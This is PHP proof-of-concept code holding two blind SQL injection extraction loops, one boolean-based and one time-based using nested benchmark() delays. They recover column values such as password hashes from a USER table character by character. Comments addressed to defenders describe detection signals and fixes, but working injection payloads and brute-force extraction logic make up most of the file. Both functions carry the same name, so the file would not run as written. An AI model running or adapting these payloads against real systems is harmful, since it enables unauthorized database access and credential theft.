/**
 * Boolean-based blind SQL injection extraction loop (proof-of-concept code).
 *
 * Recovers one column value from the USER table one character at a time.
 * For each position it asks the target whether the lower-cased character at
 * that position has a given ASCII code, using the truthiness of
 * http_connect() as the yes/no oracle.
 *
 * Reviewer notes for defenders:
 *  - The payload opens with a single quote and ends with an unterminated
 *    comment. This only works when the target concatenates the parameter
 *    into a quoted SQL string, so the fix on the application side is a
 *    parameterized query.
 *  - Every request carries the same fixed skeleton: comment sequences in
 *    place of spaces, ASCII(lower(SUBSTRING((SELECT ...)))) and a single
 *    changing integer. Long runs of near-identical requests that differ only
 *    in that integer are a strong detection signal in web/WAF logs.
 *  - http_connect() is defined outside this block. It presumably sends the
 *    payload and returns truthy when the injected condition held. TODO confirm.
 *
 * @param mixed $User_id Row offset interpolated into the LIMIT clause.
 * @param mixed $table   Column name interpolated after SELECT (despite the name).
 * @return string Characters recovered before the first position with no match.
 */
function brute($User_id, $table)
{
    // Candidate ASCII codes probed per position: '*' (42), '0'-'9', 'a'-'z'.
    $candidates = array_merge(array(42), range(48, 57), range(97, 122));
    $recovered = "";

    // At most 42 character positions are probed (1..42).
    for ($i = 1; $i < 43; $i++) {
        print "[+] Brute {$i} symbol...\n";

        $matched = false;
        foreach ($candidates as $j) {
            $payload = "'/**/OR/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/{$table}/**/FROM/**/USER/**/limit/**/{$User_id},1),{$i},1))))={$j},1,0)/*";
            if (http_connect($payload)) {
                $matched = true;
                break;
            }
            // Progress marker for every candidate that did not match.
            print ".";
        }

        // No candidate matched: treat this as the end of the value and stop.
        if (!$matched) {
            break;
        }

        $recovered .= chr($j);
        print chr($j) . "\n";
    }

    return $recovered;
}
/**
 * Time-based blind SQL injection extraction loop (proof-of-concept code).
 *
 * Recovers one column value from the USER table one character at a time.
 * The injected condition calls nested benchmark(... md5(now())) when the
 * guessed character code matches, and evaluates to 0 otherwise.
 *
 * Reviewer notes for defenders:
 *  - The observable side channel is presumably response latency, measured
 *    inside http_connect(), which is defined outside this block. TODO confirm.
 *  - The payload is appended with AND and no quote, so the vulnerable
 *    parameter is most likely used unquoted (numeric context) in the query.
 *    Parameterized queries or strict integer casting close it.
 *  - Detection signals visible here: comment sequences in place of spaces,
 *    benchmark( and ASCII(lower(SUBSTRING((SELECT in a request parameter,
 *    bursts of requests that differ only in one integer, and periodic slow
 *    queries in the database slow log.
 *  - For the "Password" column the alphabet is '*' plus hex digits, which
 *    presumably targets a hex-encoded hash format. Verify against the target schema.
 *  - str_split() is byte-wise, so multi-byte characters in the wide alphabet
 *    are probed as individual bytes.
 *
 * @param mixed $User_id Row offset interpolated into the LIMIT clause.
 * @param mixed $table   Column name interpolated after SELECT (despite the name).
 * @return string Characters recovered before the first position with no match.
 */
function brute($User_id, $table)
{
    // Pick the candidate alphabet: narrow for "Password", wide otherwise.
    $alphabet = ($table == "Password")
        ? "*1234567890abcdef"
        : "1abcdefghijklmnopqrstuvwxyz_234567890 !'#%&()*+,-./:;<=>?@[\\]^{|}~à áâãäåæçèéêëìÃîïðñòóôõö÷øùúûüýþÿž";
    $symbols = str_split($alphabet);
    $recovered = "";

    // At most 42 character positions are probed (1..42).
    for ($i = 1; $i < 43; $i++) {
        print "[+] Brute {$i} symbol...\n";

        $matched = false;
        foreach ($symbols as $symbol) {
            $brute = ord($symbol);
            $payload = "/**/AND/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/{$table}/**/FROM/**/USER/**/limit/**/{$User_id},1),{$i},1))))={$brute},benchmark(1,benchmark(2000000,md5(now()))),0)";
            if (http_connect($payload)) {
                $matched = true;
                break;
            }
            // Progress marker for every candidate that did not match.
            print ".";
        }

        // Alphabet exhausted without a match: treat this as the end of the value.
        if (!$matched) {
            break;
        }

        $recovered .= $symbol;
        print $symbol . "\n";
    }

    return $recovered;
}